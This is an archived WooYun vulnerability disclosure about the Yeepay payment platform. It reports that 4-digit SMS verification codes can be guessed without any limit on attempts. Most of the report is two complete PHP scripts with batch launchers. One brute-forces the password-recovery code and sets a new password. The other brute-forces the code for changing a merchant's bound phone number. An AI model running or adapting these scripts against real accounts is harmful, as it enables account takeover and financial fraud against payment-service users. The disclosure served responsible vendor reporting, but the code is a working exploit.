乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-05-16: 细节已通知厂商并且等待厂商处理中 2014-05-19: 厂商已经确认,细节仅向厂商公开 2014-05-29: 细节向核心白帽子及相关领域专家公开 2014-06-08: 细节向普通白帽子公开 2014-06-18: 细节向实习白帽子公开 2014-06-30: 细节向公众公开
知道商户的注册邮箱,可以任意修改商户密码,以及更换密保手机
1.由于对手机认证码的验证次数不识别的原因,4位数字验证码可以在10分钟穷举出用户密码首页,点击找回密码后,输入用户email以及验证码,点击发送验证码。之后可以无限次的试验证码,由于验证码只有4位,通过程序穷举。2.修改新密码后,可以登录进入会员中心,修改动态密码手机,理由如1.
忘记密码:forget.bat
set PATH=%cd%\php\;%cd%\php\extset PHPRC=%cd%\php\cls%cd%\php\php.exe %cd%\forget.php 0pause
forget.php
<?php$newpassword='my198191';$num= intval($argv[1]);$user=array( 'user_name'=>'用户名'); $num=$num+1000; for($i=$num;$i<10000;$i++){ $user['dynapasswd']=$i; $data=get_michtml("https://www.yeepay.com/selfservice/verifyCallBackPwdInfo.action",$user,"GBK","SSL","yeepay_pay","yeepay_pay"); echo $data['output']."\r\n"; $output=$data['output']; $output=str_replace("{",'{"',$output); $output=str_replace("}",'"}',$output); $output=str_replace(':','":"',$output); $output=str_replace(',','","',$output); $outdata=json_decode($output,true); if(isset($outdata['retCode']) && ($outdata['retCode']=="1")){ echo '验证码为:'.$i."\r\n".$data['output']; unset($user['dynapasswd']); $user['method']="init"; $user['callbackType']="mobile"; $data=get_michtml("https://www.yeepay.com/selfservice/forgotPwdRetrieve.action",$user,"GBK","SSL","yeepay_pay","yeepay_pay"); $user['method']="retrieve"; $user['password']=$newpassword; $user['password1']=$newpassword; $data=get_michtml("https://www.yeepay.com/selfservice/forgotPwdRetrieve.action",$user,"GBK","SSL","yeepay_pay","yeepay_pay"); echo '新密码为:'.$newpassword; break; }else{ echo '正在检测:'.$i."\r\n"; } }sleep(1000000);function get_michtml($url,$data=array(),$html_char='UTF-8',$is_ssh='http',$cookiejar='',$cookiefile=''){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_TIMEOUT, 6000); curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/2008052906 Firefox/3.0'); if($is_ssh=='SSL'){ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); } curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); if(!empty($data)){ curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $cookiespath = dirname(__FILE__).DIRECTORY_SEPARATOR; if($cookiefile){ curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiespath.$cookiefile.'.txt'); } if($cookiejar){ curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiespath.$cookiefile.'.txt'); } $output = curl_exec($ch); if($html_char!='GBK'){ $output=mb_convert_encoding($output, "GBK", $html_char); } $info = curl_getinfo($ch); curl_close($ch); $returntemp = array('output'=>$output,'info'=>$info); return $returntemp; }?>
修改验证手机:yeepay.bat
set PATH=%cd%\php\;%cd%\php\extset PHPRC=%cd%\php\cls%cd%\php\php.exe %cd%\yeepay.php 0pause
yeepay.php
<?php$num= $argv[1];$user=array( 'username'=>'用户名', 'callbackUrl'=>'https://www.yeepay.com/login/shopBack/', 'password'=>'密码',);$data=get_michtml("https://www.yeepay.com/selfservice/customerLoginInterface.action",$user,"GBK","SSL","yeepay_login","yeepay_login");$prex='/<input type="hidden" name="(.*)" value="(.*)" \/>/isU';preg_match_all($prex, $data["output"], $reg);if(isset($reg[1]) &&(count($reg[1])==2)){ $user=array(); $user[$reg[1][0]]=$reg[2][0]; $user[$reg[1][1]]=$reg[2][1]; $data=get_michtml("https://www.yeepay.com/selfservice/validateCustomerCert.action",$user,"GBK","SSL","yeepay_login","yeepay_login"); if(!$num){ $data=get_michtml("http://www.yeepay.com/selfservice/sendModifyMobileSMSAjax.action",$user,"GBK","http","yeepay_login","yeepay_login"); } $num=$num+1000; for($i=$num;$i<10000;$i++){ $user=array( "smsCode"=>$i, ); $data=get_michtml("http://www.yeepay.com/selfservice/verifyOldMobileSms.action",$user,"GBK","SSL","yeepay_login","yeepay_login"); if(stristr($data["output"],"验证码错误")){ echo "检测:".$i."\r\n"; }else{ if(stristr($data["output"],"verifyNewMobileSms.action")){ echo "验证码为:".$i."\r\n"; break; }else{ echo "疑似检测:".$i."\r\n"; } } } }else{ echo '用户名密码错误';}sleep(10000000);function get_michtml($url,$data=array(),$html_char='UTF-8',$is_ssh='http',$cookiejar='',$cookiefile=''){ $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_TIMEOUT, 6000); curl_setopt ($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9) Gecko/2008052906 Firefox/3.0'); if($is_ssh=='SSL'){ curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false); } curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); if(!empty($data)){ curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $data); } $cookiespath = dirname(__FILE__).DIRECTORY_SEPARATOR; if($cookiefile){ curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiespath.$cookiefile.'.txt'); } if($cookiejar){ curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiespath.$cookiefile.'.txt'); } $output = curl_exec($ch); if($html_char!='GBK'){ $output=mb_convert_encoding($output, "GBK", $html_char); } $info = curl_getinfo($ch); curl_close($ch); $returntemp = array('output'=>$output,'info'=>$info); return $returntemp; }?>
危害等级:中
漏洞Rank:5
确认时间:2014-05-19 14:12
感谢您的提交,请将联系方式发送我们,以便我们发送礼物已表谢意
暂无
